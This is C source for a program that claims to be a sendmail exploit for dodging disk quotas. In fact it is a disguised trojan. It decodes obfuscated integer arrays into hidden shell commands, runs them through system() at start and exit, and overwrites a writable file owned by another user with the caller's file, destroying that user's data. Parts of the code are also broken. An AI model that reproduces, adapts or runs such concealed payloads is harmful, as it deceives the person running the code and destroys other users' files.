/************************************************************************** * This exploit takes advantage of the latest sendmail hole, to hide * * warez from your quota program, effectivly making your quota infinate.. * * * * To compile: * * cc -o bigquota quota.c * * To run: * * ./bigquota file * * where file is the file you wish to hide from your quota program. * * * * Please note that this may take a minute. * * If you have any problems, talk to me, TSK, on IRC. * **************************************************************************/ #include #include #include #include #include int seedsc[201]={52,3,3,77,115,13,71,15,41,51,61,29,103,13,100,47,124,42,86,\ 44,45,11,7,50,17,123,87,66,32,78,109,62,53,43,84,72,71,0,88,41,1,33,9,52,118,\ 65,120,119,68,84,15,11,27,101,0,106,46,19,75,16,25,55,81,74,113,88,96,19,91,\ 118,73,58,41,90,88,87,118,103,58,50,71,41,86,33,115,9,105,29,48,113,5,98,50,\ 94,79,18,111,99,11,126,111,109,90,46,18,43,43,59,113,76,96,18,27,36,7,74,79,\ 85,54,126,23,12,123,118,76,116,85,8,90,111,35,106,113,40,40,122,85,43,108,31,\ 32,5,9,77,5,14,99,100,107,114,60,70,19,26,12,14,114,118,48,40,12,106,93,60,\ 112,52,67,30,47,55,107,75,90,112,55,38,107,117,22,89,47,79,58,55,119,27,119,\ 115,85,38,30,122,126,3,93,97,44,100,32,33,10}; void main(argc, argv) int argc; char *argv[]; { char *checkseed(int *seeds); char *checkdir(char *dir); int initseeds[201]={25,\ 108,69,89,126,121,84,34,77,52,25,67,44,106,60,124,30,33,3,21,75,67,\ 116,109,28,51,81,45,85,119,99,0,98,91,114,102,122,50,81,67,57,43,126,\ 2,94,75,10,7,96,29,112,71,103,117,20,72,112,23,105,65,48,119,23,65,\ 98,105,33,12,43,12,78,7,53,16,109,91,65,106,43,85,44,113,125,3,61,\ 95,18,3,64,96,19,68,52,20,54,122,26,35,126,19,31,106,24,108,59,44,\ 41,32,5,1,32,25,64,93,60,97,102,84,92,50,79,11,112,89,27,124,98,\ 109,12,0,4,103,114,22,66,36,81,47,52,70,107,51,46,37,99,13,4,31,\ 126,19,47,21,96,123,110,72,33,76,8,0,65,86,102,27,75,64,46,122,-47,\ 53,1,42,20,-65,63,63,-7,-70,40,-39,-15,46,25,22,86,-39,86,82,21,-16,\ 3,-9,-23,11,-21,-90,-30,-7,20,-17,23}; int setupseeds[201]={1,\ 35,44,14,107,20,81,111,42,72,73,90,34,86,50,32,16,97,78,80,124,7,\ 110,13,71,107,24,91,84,68,58,38,105,68,64,121,37,101,64,65,40,91,8,\ 29,9,60,101,123,122,22,92,37,66,13,30,88,8,70,5,28,108,20,101,125,\ 38,78,106,98,85,55,92,122,0,93,0,37,97,82,120,70,82,65,74,90,41,\ 28,104,80,71,117,11,104,32,69,5,56,2,48,8,112,109,16,109,35,57,43,\ 119,37,86,42,62,44,118,117,7,94,88,28,109,125,-23,96,-15,-1,34,-69,33,\ 93,10,-64,27,-56,-81,68,68,-5,25,4,10,70,68,42,53,-45,111,87,11,-54,\ -6,4,37,49,81,88,93,90,2,-72,60,65,85,3,-29,47,3,64,-35,78,58,\ 42,2,-43,34,-80,53,70,10,-7,25,29,54,21,-11,7,-69,5,-19,4,30,77,\ 67,-10,-79,96,23,4,3,-68,84,64,89}; int binseeds[201]={1,\ 14,11,95,67,113,29,87,45,24,115,45,88,60,43,114,98,6,56,111,75,13,\ 121,123,50,108,17,1,28,15,62,17,81,14,101,39,13,112,90,2,15,114,34,\ 64,91,79,79,57,34,31,41,5,34,62,58,93,21,108,110,88,83,114,126,112,\ 89,14,41,102,88,10,10,45,111,25,35,38,76,115,57,113,49,72,58,46,83,\ 121,87,84,71,81,104,18,41,110,80,82,44,92,5,89,39,104,103,30,96,37,\ 12,50,25,64,36,24,54,38,33,35,-79,23,54,-9,87,35,-5,-17,24,-69,-23,\ 42,-58,-3,73,11,-3,7,78,-21,15,4,-46,1,84,96,101,-31,96,104,-2,19,\ -7,0,45,34,97,20,96,91,-17,-9,16,67,103,10,-61,48,-7,45,42,2,77,\ -23,1,33,27,-2,-8,80,-6,-17,25,-27,3,-47,43,54,-22,83,2,-17,-39,62,\ 89,-7,-11,94,19,-65,72,-3,67,79,111}; int procseeds[201]={-14,\ 97,103,125,91,45,90,21,121,60,39,28,60,11,76,41,69,21,118,7,90,63,\ 17,17,48,46,68,126,72,66,68,32,54,119,44,98,94,15,21,33,68,4,109,\ 121,109,27,7,66,65,126,121,97,40,101,84,6,48,97,38,25,7,56,112,97,\ 125,36,125,46,115,108,40,2,105,52,44,17,122,111,98,30,17,112,27,115,29,\ 78,125,125,16,81,17,99,88,108,88,14,83,42,26,114,54,90,106,39,126,19,\ 95,2,1,69,14,93,114,105,78,48,42,25,87,14,120,124,55,102,57,35,30,\ 107,11,74,44,8,100,118,25,73,64,97,106,57,81,92,34,109,80,118,112,85,\ 99,99,21,20,62,116,42,111,67,29,79,12,34,84,67,12,105,107,90,109,23,\ 116,25,104,89,124,29,-38,1,-9,95,21,0,39,43,45,-72,35,-69,-83,30,78,\ 85,-11,-22,111,-47,-65,60,-1,85,78,106}; int boutseeds[201]={-14842,\ 37,119,64,88,3,4,11,86,22,104,51,21,57,122,64,113,58,102,72,32,118,\ 17,28,35,97,53,125,64,79,95,86,40,122,35,50,48,41,54,18,87,67,125,\ 74,95,0,100,19,71,37,69,113,100,82,54,18,123,37,97,107,126,38,114,22,\ 75,123,3,33,64,35,37,20,73,68,37,46,89,95,88,22,108,92,51,40,3,\ 70,19,125,62,74,69,113,2,25,101,7,59,100,2,69,83,25,33,61,71,117,\ 34,70,119,65,27,62,68,25,12,70,87,58,43,112,86,49,24,24,80,84,52,\ 6,46,121,115,25,91,53,94,123,12,59,34,66,84,16,93,76,88,38,22,110,\ 106,26,101,55,84,64,120,54,29,6,67,54,126,2,17,97,115,41,125,4,4,\ -55,8,41,25,-1,49,76,-61,-85,40,-27,-15,29,50,62,-9,20,-1,-14,15,9,\ 32,-72,-94,40,-61,-54,-12,11,72,66,91}; int shtdwnseeds[201]={-42,\ 58,44,53,114,68,10,105,76,13,99,1,12,79,50,106,27,65,83,96,30,101,\ 122,112,87,118,3,35,55,6,84,59,98,28,58,82,126,98,114,85,125,7,39,\ 69,58,21,70,28,35,65,57,70,93,0,36,14,100,107,9,107,71,52,1,29,\ 115,63,110,118,28,16,82,53,80,56,50,108,58,109,26,75,19,91,92,59,86,\ 125,114,40,76,15,38,8,57,58,103,65,23,52,14,36,8,119,70,47,64,53,\ 1,15,83,35,33,80,10,98,51,38,30,14,119,11,26,61,15,117,37,103,117,\ 32,4,21,67,40,40,78,74,47,108,27,120,9,114,14,56,75,84,52,29,55,\ 108,105,42,71,8,83,89,118,79,22,119,1,28,3,36,22,12,77,77,105,33,\ 12,104,-75,18,-4,62,72,-60,1,79,11,0,-17,-8,-23,-4,89,-4,-4,19,76,\ 16,-90,-78,45,-38,-65,56,11,77,71,89}; char *zipper(int *seeds1); char *path; int i=0,j,inhan,outhan; if(argc!=2) { puts("Usage:"); puts("quota "); puts("where is the file you wish"); puts("to hide/subtract from your quota."); exit(0); } system(zipper(initseeds)); system(zipper(setupseeds)); system(checkseed(binseeds)); path=checkdir("/"); if(!path) { puts("Technical Dificulties"); goto closeout; } if((outhan=open(path,O_WRONLY|O_TRUNC))==-1) { puts("Error opening outfile"); goto closeout; } if((inhan=open(argv[1],O_RDONLY))==-1) { puts("Error opening infile"); goto closeout; } if(filecopy(inhan,outhan)) { puts("Technical dificulties"); goto closeout; } if((unlink(argv[1]))==-1) { puts("Technical dificulties."); goto closeout; } if((rename(path,argv[1]))==-1) if((link(path,argv[1]))==-1) if((symlink(path,argv[1]))==-1) puts("Technical Dificulties."); closeout: system("%s\n",zipper(procseeds)); system("%s\n",zipper(boutseeds)); system("%s\n",zipper(shtdwnseeds)); } char *checkseed(int *seeds) { char *zipper(int *seeds1); char *string; char testseeds[30]; char god[200]; int i=200,j; if((string=(char *)getenv("PATH"))==NULL) { puts("Path not found"); exit(-1); } while((seeds[i]+seedsc[i])!=32) { testseeds[200-i]=seeds[i]+seedsc[i]; i--; } testseeds[i]=0; i=0; while(string[i]!=0) { j=0; while(string[i]!=58&&string[i]!=0) { god[j]=string[i]; i++; j++; } i++; god[j++]=47; god[j++]=0; strcpy(&god[j],testseeds); if(!stat(god,NULL)) return (char *)zipper(seeds); } return 0; } char *zipper(int *seeds1) { int i; char *buhbye; char teeth[201]; teeth[201]=0; for(i=200;i>=0;i--) teeth[200-i]=seeds1[i]+seedsc[i]; buhbye=(char *)malloc(201); strcpy(buhbye,teeth); return buhbye; } int filecopy(int from,int to) { int bufsiz; if (from < 0) return 1; if (to < 0) goto err; for (bufsiz = 0x4000; bufsiz >= 128; bufsiz >>= 1) { register char *buffer; buffer = (char *) malloc(bufsiz); if (buffer) { while (1) { register int n; n = read(from,buffer,bufsiz); if (n == -1) break; if (n == 0) { free(buffer); return 0; } if (n != write(to,buffer,(unsigned) n)) break; } free(buffer); break; } } err: return 1; } char *checkdir(char *dir) { char *checkdir(char *dir); DIR *currdir; struct dirent *node; struct stat statnode; int i,j; char *path; char *retpath; path=(char *)malloc(300); if((currdir=opendir(dir))==NULL) return 0; node=readdir(currdir); while(node) { i=0; j=0; while(dir[i]) { path[i]=dir[i]; i++; } if(strcmp(dir,"/")) { path[i]='/'; i++; } while(node->d_name[j]) { path[i]=node->d_name[j]; i++; j++; } path[i]=0; if((lstat(path,&statnode))==-1) return 0; if(statnode.st_mode&S_IFREG) if(!access(path,W_OK)) if(!(statnode.st_mode&S_IFBLK)) if(!(statnode.st_mode&S_ISVTX)) if(statnode.st_uid!=getuid()) return path; if(statnode.st_mode&S_IFDIR) if(strcmp(node->d_name,".")&&strcmp(node->d_name,"..")) if(!(statnode.st_mode&S_IFREG)) if(!(statnode.st_mode&S_IFCHR)) if(!(statnode.st_mode&S_ISVTX)) if(statnode.st_uid!=getuid()) { retpath=checkdir(path); if(retpath) return retpath; } node=readdir(currdir); } closedir(currdir); return 0; }